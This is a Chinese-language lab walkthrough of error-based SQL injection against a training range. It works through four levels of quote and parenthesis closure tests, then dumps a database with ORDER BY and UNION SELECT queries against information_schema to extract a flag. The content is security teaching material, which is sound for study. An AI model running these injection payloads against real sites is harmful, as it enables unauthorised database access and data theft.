SQL注入的本质:就是将用户输入的数据当作代码带入执行。
注入条件:
1.用户能控制输入
2.能够将程序原本执行的代码,拼接上用户输入的数据进行执行
首先检查是否存在注入点
Rank1:
构造语句 ?id=1 and 1=1 没有报错
![[靶场实战]:SQL注入-显错注入_第1张图片](http://img.e-com-net.com/image/info8/aa0b03080f9a4b158f85d076a9dfb12e.jpg)
?id=1 and 1=2 也没有显示错误,检查是否被过滤了
![[靶场实战]:SQL注入-显错注入_第2张图片](http://img.e-com-net.com/image/info8/227e5d8be8ca4010ba844d65688438be.jpg)
?id=1' and 1=1 出现错误,说明这里被单引号过滤掉了
![[靶场实战]:SQL注入-显错注入_第3张图片](http://img.e-com-net.com/image/info8/0263fe710f064feaa84ff5a6601e24fc.jpg)
?id=1' and 1=1 --+ 回显正确 存在注入
![[靶场实战]:SQL注入-显错注入_第4张图片](http://img.e-com-net.com/image/info8/96eb8f051c024e638bac5a24ac20b4fc.jpg)
Rank2:
?id=1 and 1=1 回显正确
![[靶场实战]:SQL注入-显错注入_第5张图片](http://img.e-com-net.com/image/info8/c8eaace6ef67439089ac82ddcf2f698e.jpg)
?id=1 and 1=2 回显错误,判断存在注入
![[靶场实战]:SQL注入-显错注入_第6张图片](http://img.e-com-net.com/image/info8/d9ddbbbb3e444891b48896eca82b1629.jpg)
Rank3:
构造:?id=1 and 1=1 回显正确
![[靶场实战]:SQL注入-显错注入_第7张图片](http://img.e-com-net.com/image/info8/7fe9940fb33a48d283f1f7a68a67c7c0.jpg)
?id=1 and 1=2 回显正确
![[靶场实战]:SQL注入-显错注入_第8张图片](http://img.e-com-net.com/image/info8/83e64e6046084a52b34994654ba5a0f4.jpg)
?id=1' and 1=1 --+ 闭合引号回显错误,表示出现其他闭合
?id=1')and 1=1 --+ 尝试闭合括号进行绕过,回显正确,存在注入
![[靶场实战]:SQL注入-显错注入_第9张图片](http://img.e-com-net.com/image/info8/b1876469f015455ca499fc39ceb89c10.jpg)
Rank4:
构造语句:?id=1 and 1=1 回显正确
![[靶场实战]:SQL注入-显错注入_第10张图片](http://img.e-com-net.com/image/info8/c7d794a6f3db46249362f727cfd1a4db.jpg)
?id=1 and 1=2 回显正确,判断存在过滤
![[靶场实战]:SQL注入-显错注入_第11张图片](http://img.e-com-net.com/image/info8/a6442fa1161a40bb93303398e9a031d5.jpg)
?id=1'and 1=1 --+ 判断是否存在'闭合 回显正确
![[靶场实战]:SQL注入-显错注入_第12张图片](http://img.e-com-net.com/image/info8/18de7c643088422d987d3f1a22571e8a.jpg)
?id=1'and 1=2 --+ 回显正确 表示未出现'闭合
![[靶场实战]:SQL注入-显错注入_第13张图片](http://img.e-com-net.com/image/info8/f0df8ebb1ae54a6abb4f693165e06436.jpg)
?id=1)and 1=1--+ 判断是否存在括号闭合 回显正确
![[靶场实战]:SQL注入-显错注入_第14张图片](http://img.e-com-net.com/image/info8/7bcdbd6995ce442c9800dc6c05635beb.jpg)
?id=1)and 1=2--+ 依然回显正确
![[靶场实战]:SQL注入-显错注入_第15张图片](http://img.e-com-net.com/image/info8/3e9277f46b4549b1a8ae32edd639cead.jpg)
?id=1" and 1 = 1 --+再试一下是否存在"闭合,回显错误,证明存在"闭合
![[靶场实战]:SQL注入-显错注入_第16张图片](http://img.e-com-net.com/image/info8/0ad0e5c9a82a4882a6b293482857cc62.jpg)
?id=1") and 1 = 1 --+ 尝试和)一起判断过滤,回显正确,存在注入
![[靶场实战]:SQL注入-显错注入_第17张图片](http://img.e-com-net.com/image/info8/c6ace2e20a18497e9fe19ecb98c482c7.jpg)
脱库
由于Rank1-Rank4 都是显错注入,除了过滤之外的步骤都相同,就以Rank1进行脱库步骤
判断当前表的字段数:
?id=1' order by 5 --+ 判断字段数及回显点,显示错误,说明字段小于5
![[靶场实战]:SQL注入-显错注入_第18张图片](http://img.e-com-net.com/image/info8/9f7f885c10484516ad81b9ad13b127b8.jpg)
最后判断字段数为3 :
?id=1' order by 3 --+
![[靶场实战]:SQL注入-显错注入_第19张图片](http://img.e-com-net.com/image/info8/295c92826e7d4c12b5bb43d68709f82f.jpg)
使用联合查询判断显示位置
?id=0'union select 1,2,3 --+
![[靶场实战]:SQL注入-显错注入_第20张图片](http://img.e-com-net.com/image/info8/e46a19611c424d58b64a5fb32aca8f61.jpg)
这里选择2和3构建子查询都可
查询数据库名:
?id=0'union select 1,database(),3 --+
![[靶场实战]:SQL注入-显错注入_第21张图片](http://img.e-com-net.com/image/info8/8941a03c2a784e8ea6e97898041f1ea6.jpg)
查询表名:
?id=0'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema ='security'),3 --+
![[靶场实战]:SQL注入-显错注入_第22张图片](http://img.e-com-net.com/image/info8/2b0cdf374d064f27b62798e038f8f586.jpg)
查找表中的字段:
因为是找flag,就查找我们觉得最有可能存在的表
?id=0'union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'zkaq'),3 --+
![[靶场实战]:SQL注入-显错注入_第23张图片](http://img.e-com-net.com/image/info8/fdf5d9109df445d683057ff63f538f0c.jpg)
存在flag
构建查数据的语句:
?id=0'union select 1,(select group_concat(flag,zKaQ) from security.zkaq),3 --+
![[靶场实战]:SQL注入-显错注入_第24张图片](http://img.e-com-net.com/image/info8/5583648ad5a7438aa12bbcd6a69adbee.jpg)